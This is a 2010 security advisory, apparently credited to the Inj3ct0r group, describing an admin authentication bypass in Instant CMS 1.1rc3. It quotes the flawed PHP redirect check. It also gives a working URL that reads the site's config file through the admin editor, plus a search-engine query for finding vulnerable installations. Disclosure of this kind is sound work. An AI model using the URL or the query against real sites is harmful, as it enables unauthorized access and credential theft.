Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability

2010-03-24T00:00:00
ID SECURITYVULNS:DOC:23445
Type securityvulns
Reporter Securityvulns
Modified 2010-03-24T00:00:00

Description

======================================================= Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability =======================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

[+] Discovered By : Inj3ct0r

[+] Site : Inj3ct0r.com

[+] Support e-mail : submit[at]inj3ct0r.com

[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Site product: http://instantcms.ru/ Version: 1.1rc3

admin/index.php

Vulnerable code:

//-------CHECK AUTHENTICATION-------------------------------------- if (!isset($_SESSION['user'])) {
header('location:login.php');
} else {
if (!cmsUserIsAdmin($_SESSION['user']['id'])){
if (cmsUserIsEditor($_SESSION['user']['id'])){ header('location:editor/index.php'); } else { header('location:login.php'); } } } //------------------------------------------------------------------

Admin panel have no password. And then you can watch and modify any files:

http://instantcms.ru/admin/index.php?view=editor&lang=php&file=/includes/config.inc.php


Google gives about 100 results found for :

intext: InstantCMS inurl: view-content/do-read


Inj3ct0r.com [2010-03-24]